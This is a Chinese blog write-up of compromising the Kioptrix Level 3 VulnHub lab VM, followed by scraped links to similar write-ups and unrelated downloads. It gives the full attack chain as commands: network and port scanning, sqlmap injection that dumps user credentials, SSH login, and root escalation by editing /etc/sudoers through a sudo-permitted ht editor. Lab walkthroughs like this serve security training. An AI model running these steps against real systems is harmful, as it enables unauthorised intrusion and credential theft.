KioptrixVM3提权

于 2024-09-13 21:23:44 发布
阅读量260 收藏
点赞数 7
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/142220450
版权

链接先c段扫描一下

arp-scan -l

扫描一下ip

nmap - sV -p- 192.168.48.135

发先22和80端口

访问一下、

在跳转中发现

无论则么点都会跳到koiptrix3.com

将连接换为http://192.168.48.135可以正常访问为了方便,我这边将/etc/hosts文件配置一下

在这个页面发先可能存在sql注入

这边用sqlmap跑一下

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs

发现存在sql注入

这里会让我们选则注入点

看一下表

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables

查看一下表下字段

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T gallarific_users --columns

查看一下username,password

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts -C username,password --dump

sqlmap帮我们解出密码了

之前80端口发现过一个登陆界面

登陆了一下发现不行

想起22端口远程连接试试

发现连接成功

提权

cat /etc/passwd
发现 loneferret 用户存在利用点

切换到第二个用户

kali需要凭证
ssh -oHostKeyAlgorithms=+ssh-dss loneferret@192.168.48.135

查看一下家目录

ls
cat CompanyPolicy.README

find / -perm -u=s -type f 2>/dev/null
sudo -l
sudo /usr/local/bin/ht
//报错Error opening terminal: xterm-256color.则 
则执行export TERM=xterm
//ht编辑器修改/etc/sudoers:F3 --> 查找 /etc/sudoers --> 添加 /bin/bash --> F2 保存 --> F10 退出
 
sudo /bin/bash

提权成功

mouyu⇔
关注
KioptrixVM3-writeup
Lee
08-20 447
KioptrixVM3-writeup 0x00 信息收集 nmap -A -T4 -p 1-65535 16.16.16.180 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 15:16 CST
渗透测试-KioptrixVM3靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-02 2283
1.环境部署 靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar 攻击机:Kali 2019.2 amd64 靶机 : KioptrixVM3靶机 目标:拿下靶机root权限 2.信息收集 使用arp-scan -l进行局域网主机发现 得到靶机IP地址,使用Nmap进行端口扫描 nmap -sV 192.168.227.13...
KioptrixVM3
cxyzupup的博客
01-10 1779
KioptrixVM3 项目地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24 提示:靶机网络连接方式使用NAT模式。 文章目录KioptrixVM3一、信息收集:1. 靶机IP查找:2. 使用nmap进行端口扫描:二、信息利用/系统提权1.枚举web服务:2. 访问gallery目录后未发现有用信息3. 对gallery目录进行再次枚举4. 在gallery目录下发现一个gallery.php文件,验证后发现该http下存在注入5. 通过注入获取
KioptrixVM3 靶机渗透测试
weixin_58786230的博客
07-30 292
【代码】KioptrixVM3 靶机渗透测试。
Vulnhub系列:kioptrixVM3
Fuzz
08-10 2499
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为OSCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ 运行环境 kali:192.168.44.128 靶机:192.168.44.134 相关知识点 0x00、信息收集 主机发现:nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV 192.168.44.134 0
Kioptrix Level 3 靶机wp
m0_52496313的博客
08-14 340
Kioptrix Level 3 靶机wp
vulnhub靶机测试--Kioptrix 3
ximo的博客
03-25 472
目录前言信息收集主机发现端口扫描目录扫描漏洞利用提权总结 前言 这个系列基本上没有web方面的漏洞,都是系统、CMS版本漏洞;主要是了解一下提权方法。 信息收集 主机发现 端口扫描 目录扫描 漏洞利用 访问80端口: 第一个页面有个page参数,试了试文件包含,失败。 第二个页面有个system参数,命令执行漏洞?? 失败。 第三个页面是一个登录页面,同时知道了CMS。 再看看其他目录: 1.数据库登录后台 2.一个看不懂的(没加载,速度慢的网页): 3.目录遍历,但是啥用没有。 查找CMS
Vunlhub靶场 Kioptrix 3
m0_57221101的博客
02-18 373
勘探 nmap探查 port 备注 22/tcp openssh 4.7p1 80/tcp apache 2.2.8 80web 主页是这样的 有一个登录界面 发现这个cms有一个rce漏洞 然后目录扫描出很多东西 python3.9 dirsearch.py -u 192.168.1.104 [20:51:48] 200 - 2KB - /cache/ [
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8456
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
JAVA+access综合测评系统毕业设计(源代码+论文+开题报告+任务书).zip
09-12
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
33企业财务风险分析及防范——以永辉超市股份有限公司为例.docx
09-12
33企业财务风险分析及防范——以永辉超市股份有限公司为例
JAVA物业管理系统设计与实现(论文+源代码).zip
09-12
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
基于springboot的车辆充电桩管理系统设计与实现.docx
09-12
基于springboot的车辆充电桩管理系统设计与实现.docx
weixin196运动健康小程序SpringBoot.rar
09-12
所有源码都可以运行成功
开家可乐店bcm4文件
09-12
此文件请下载源码编辑器后再使用,否则无法打开,请尽量不要更改源代码,因为此文件更改代码后可能功能不同,版本号:v2.1
Zblog 的CDNfly-CloudFlare全能CDN自动刷新缓存插件-自动清理-适配优化2.1.0版本
09-12
Zblog 的CDNfly|CloudFlare全能CDN自动刷新缓存插件_自动清理_适配优化2.1.0版本 Zblog 的CDNfly|CloudFlare全能CDN自动刷新缓存插件,包括其自动清理、适配优化和缓存配置,手动刷新,全站刷新,自动预热等功能
ssm+mysql的在线投票系统(源码+lw+ppt)
09-12
内容概要: 基于Java语言、SSM框架和MySQL数据库的在线投票系统。系统包含前台和后台两个主要部分,前台提供用户注册、发起投票、查看投票主题、在线投票和留言等功能;后台则提供管理员对用户、投票须知、投票主题和内容的管理,以及系统配置更新等功能。系统支持固定IP不可重复投票,投票结果以图表形式展示,增强了用户体验和互动性。 适用人群: 本系统适用于需要在线投票功能的网站或应用程序,尤其适合需要用户参与决策、调查或意见收集的组织和个人。 使用场景及目标: 1. 用户可以通过前台界面注册账户,发起投票,查看和参与投票主题。 2. 用户可以收藏感兴趣的投票主题,查看投票结果和统计图表。 3. 管理员通过后台界面管理注册用户、审核投票内容、更新投票须知和管理系统配置。 4. 系统旨在提供一个互动性强、操作简便的在线投票平台,增强用户参与度和决策透明度。 其它说明: 系统设计注重用户体验和数据安全性,通过技术手段确保用户数据的保护。系统具备良好的扩展性,可适应未来功能升级需求。通过本系统,用户可以方便地发起和管理投票,管理员可以高效地维护投票秩序和内容质量。
java基于SpringBoot+vue 甘肃旅游服务平台系统源码 带毕业论文
最新发布
09-12
1、开发环境:SpringBoot框架;内含Mysql数据库;VUE技术;内含说明文档 2、需要项目部署的可以私信 3、项目代码都经过严格调试,代码没有任何bug! 4、该资源包括项目的全部源码,下载可以直接使用! 5、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 6、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
向日葵远程控制软件-15.6.6.62150-x64
09-12
向日葵_15.6.6.62150_x64 使用场景:远程桌面访问 用途: 向日葵远程控制软件是一款远程控制工具。您在任何可连入互联网的地点,都可以轻松访问和控制安装了向日葵远程控制软件被控端的远程主机,对远程主机进行远程桌面、远程管理、远程文件、远程摄像头、远程重启关机等操作。 功能: 1、无论何时何地,都能自由随心访问和管理自己的电脑,哪怕无人值守,设备无网,照样搞定。 2、屏幕白板:在远程桌面直接涂画、写字、用图形圈选,方便演示。 3、黑屏:支持开启和关闭黑屏模式,防止他人看到自己的操作,保护隐私。 4、桌面录像:支持桌面录像,录像可保存在客户端主机或云
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值